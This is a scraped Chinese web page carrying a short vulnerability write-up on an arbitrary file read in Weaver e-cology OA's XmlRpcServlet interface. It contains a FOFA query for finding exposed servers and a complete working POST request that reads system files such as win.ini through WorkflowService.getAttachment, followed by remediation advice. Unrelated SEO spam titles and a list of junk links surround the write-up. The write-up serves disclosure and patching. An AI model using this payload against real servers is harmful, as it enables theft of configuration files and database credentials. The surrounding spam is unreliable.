当前位置: 首页 > news >正文

阿里巴巴申请网站怎么做深圳福田住房和建设局网站官网

阿里巴巴申请网站怎么做,深圳福田住房和建设局网站官网,u nas 建设网站,网站建设的实验原理漏洞介绍 泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置…

漏洞介绍

泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台XmRpcServlet接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件 (如数据库配置文件、系统配置文件) 、数据库配置文件等等,导致网站处于极度不安全状态。

FOFA

app=“泛微-OA(e-cology)”

漏洞复现

读取win.ini文件

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/xml
Accept-Encoding: gzip
Content-Length: 218
Connection: keep-alive<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>

在这里插入图片描述
对返回的密文进行解码
在这里插入图片描述

修复建议

官方已修复该漏洞,请用户联系商修复漏洞: https://www.weaver.com.cn/cs/securityDownload.htm
通过防火墙等安全设备设置访问策略,设置白名单访问。
如非必要,禁止公网访问该系统.

http://www.yayakq.cn/news/929276/

相关文章:

  • 网站建立前期调查53建筑网官网
  • 白银网站模板wap微信网站模板
  • 吴江住房城乡建设局网站jquery 上传wordpress
  • 可信网站验证免费创建自己的网站
  • 锦州 做网站购物网站开发多少钱
  • 网站qq登录原理游戏开发定制
  • 企业网站在ps里做吗三端互通传奇手游开服列表
  • 旅游电商网站排名jsp网站开发书籍推荐
  • 网站后台wordpress升级报错
  • 益阳营销型网站建设如何学网络推广
  • 最新在线免费网站使用爬虫做的网站
  • 自己开发微网站开发助手app
  • 济宁市松岳建设机械有限公司网站聊城公司做网站
  • 网站开发 pdf 文字版怎么在百度上推广
  • 做任务赚取佣金网站池州网站建设公司
  • 专业制作网站价格使用html制作网页
  • 自己建设的手机网站做百度地图定位wordpress导航栏字体大小
  • 淄博网站制作多样定制360度实景地图下载
  • 学生做网站的目的泉州网站制作方案
  • 如何在电商网站做市场调研想做软件开发需要学什么
  • 企业网站seo策略c2c wordpress
  • 青岛高端网站制作微信商城网站方案
  • 实用网站建设期末考试长春网站排名优化价格
  • 注册网站要多少钱一年建行官方网站
  • 大连手机网站开发网页无法访问是什么意思
  • 公司做网站广告语网站建设微信商城开发
  • 做营销型网站用那个cms好金乡做网站 亿九
  • 海口企业建站系统模板电商视觉设计是干什么的
  • 网站开发的流程是什么上海网站开发设计培训
  • 开发电子商务网站和开发新闻类网站什么异同国外优秀的网站建设公司